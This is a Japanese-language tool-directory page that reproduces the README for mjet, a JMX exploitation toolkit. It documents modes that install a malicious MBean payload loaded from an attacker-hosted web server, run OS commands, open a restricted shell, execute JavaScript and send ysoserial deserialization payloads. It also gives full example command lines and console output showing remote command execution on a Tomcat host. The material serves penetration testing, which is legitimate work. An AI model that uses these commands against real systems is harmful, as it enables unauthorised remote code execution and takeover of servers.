Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
mjet — MOGWAI LABS JMXエクスプロイトツールキット | Kitploit
ツール/GitHubGitHub/mogwailabs/mjet
ペイロード生成エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミングリモートアクセスツールArchived
GitHubmogwailabs/mjet

mjet

MOGWAI LABS JMXエクスプロイトツールキット

リポジトリを見る
20547113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

MOGWAI LABS による MJET

MOGWAI LABS JMX エクスプロイトツールキット

MJET は sjet のフォークです。sjet は siberas によって開発されましたが、もはや積極的にはメンテナンスされていません。MJET は、オリジナルの sjet コードベースの大部分も提供した MOGWAI LABS チームによってメンテナンスされています。

MJET を使用すると、安全でない設定の JMX サービスを簡単に悪用できます。追加の背景情報は ここ と ここ にあります。

!!! 重要: このプロジェクトはメンテナンスされていません

このリポジトリはもはや積極的にメンテナンスされていません。代わりに qtcs beanshooter の使用を推奨します。

前提条件

  • Jython 2.7
  • Ysoserial(JMX を介したデシリアライゼーションの脆弱性を悪用するため)
  • opendmk_jmxremote_optional_jar-1.0-b01-ea.jar(代替の JMX メッセージプロトコル(JMXMP)をサポートするため)

使用方法

MJET は CLI インターフェースを実装しています(argparse を使用)。

jython mjet.py targetHost targetPort MODE password (modeOptions)

ここで

  • targetHost - ターゲット IP アドレス
  • targetPort - JMX が実行されているターゲットポート
  • MODE - スクリプトのモード
  • modeOptions - 選択したモードのオプション

認証サポート(JMX 認証が有効な場合):

  • --jmxrole - ユーザー名
  • --jmxpassword - パスワード

その他のオプション引数:

  • --jmxmp - JMX-MP を使用する(追加の JAR のロードが必要)
  • --localhost_bypass - localhost バイパスにおけるプロキシのサービスポート
  • --shell - 定義されたシェルを使用する
  • --rmiObjectName - JMX エンドポイントの RMI 名

モードと modeOptions

  • install - 現在のターゲットにペイロードをインストールする
    • password - インストール成功後に設定するパスワード
    • payload_url - ペイロードをロードするための完全な URL
    • payload_port - ペイロードをロードするためのポート
  • uninstall - 現在のターゲットからペイロードをアンインストールする
  • changepw - 既にデプロイされたペイロードのパスワードを変更する
    • password - インストールされた MBean にアクセスするためのパスワード
    • newpass - 新しいパスワード
  • command - targetHost 上でコマンド CMD を実行する
    • password - インストールされた MBean にアクセスするためのパスワード
    • CMD - 実行するコマンド
  • shell - targetHost 上でシンプルなシェルを起動する(java の Runtime.exec() の制限付き)
    • password - インストールされた MBean にアクセスするためのパスワード
  • javascript - targetHost 上で JavaScript ファイル FILENAME を実行する
    • password - インストールされた MBean にアクセスするためのパスワード
    • FILENAME - 実行する JavaScript
  • deserialize - ysoserial ペイロードをターゲットに送信する
    • gadget - ysoserial が提供するガジェット(例: CommonsCollections6)
    • cmd - 実行するコマンド
  • webserver - MLET Web サーバーを実行するだけ
    • payload_url - ペイロードをロードするための完全な URL
    • payload_port - ペイロードをロードするためのポート

使用例

脆弱な JMX サービスへのペイロード MBean のインストール

次の例では、脆弱な JMX サービスが 10.165.188.23 のポート 2222 で実行されており、攻撃者の IP アドレスは 10.165.188.1 です。JMX サービスは攻撃者の Web サービスに接続してペイロード jar ファイルをダウンロードします。MJET は必要な Web サービスをポート 8000 で起動します。

MBean のインストールが成功すると、デフォルトのパスワードはコマンドラインで指定されたパスワード("super_secret")に変更されます。

h0ng10@rocksteady ~/w/mjet> java -jar jython-standalone-2.7.0.jar mjet.py 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.165.188.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
10.165.188.23 - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
h0ng10@rocksteady ~/w/mjet> 

JMX 資格情報を使用したインストール(サーバーの弱い設定も必要です):

h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
mJET - MOGWAI LABS JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Using credentials: JMXUSER / JMXPASSWORD
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /mogwailabs_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.mlet.MogwaiLabsPayload
[+] Successfully changed password

h0ng10@rocksteady:~/mjet$

Linux ターゲットでコマンド 'ls -la' を実行する:

ペイロードがインストールされた後、それを使用してターゲット上で OS コマンドを実行できます。

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 command super_secret "ls -la"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady ~/w/mjet>

シェルモードでの実行

毎回のコマンドで Java をロードしたくない場合は、「シェルモード」を使用して制限付きのコマンドシェルを取得できます。

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 shell super_secret 

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  5
[+] Use command 'exit_shell' to exit the shell
>>> ls -la
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


>>> pwd
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: pwd
/var/lib/tomcat8


>>> exit_shell
[+] Done
h0ng10@rocksteady ~/w/mjet> 

ターゲット上で JavaScript ペイロードを呼び出す:

サンプルスクリプト「javaproperties.js」は、脆弱なサービスの Java プロパティを表示します。次のように呼び出すことができます:

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 javascript super_secret scripts/javaproperties.js 

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  6
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing script
awt.toolkit=sun.awt.X11.XToolkit
java.specification.version=11
sun.cpu.isalist=
sun.jnu.encoding=UTF-8
java.class.path=/usr/share/tomcat8/bin/bootstrap.jar:/usr/share/tomcat8/bin/tomcat-juli.jar
com.sun.management.jmxremote.authenticate=false
java.vm.vendor=Oracle Corporation
sun.arch.data.model=64
...


[+] Done

パスワードの変更

既存のパスワード("super_secret")を "this-is-the-new-password" に変更します:

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 changepw super_secret this-is-the-new-password
ツールをダウンロード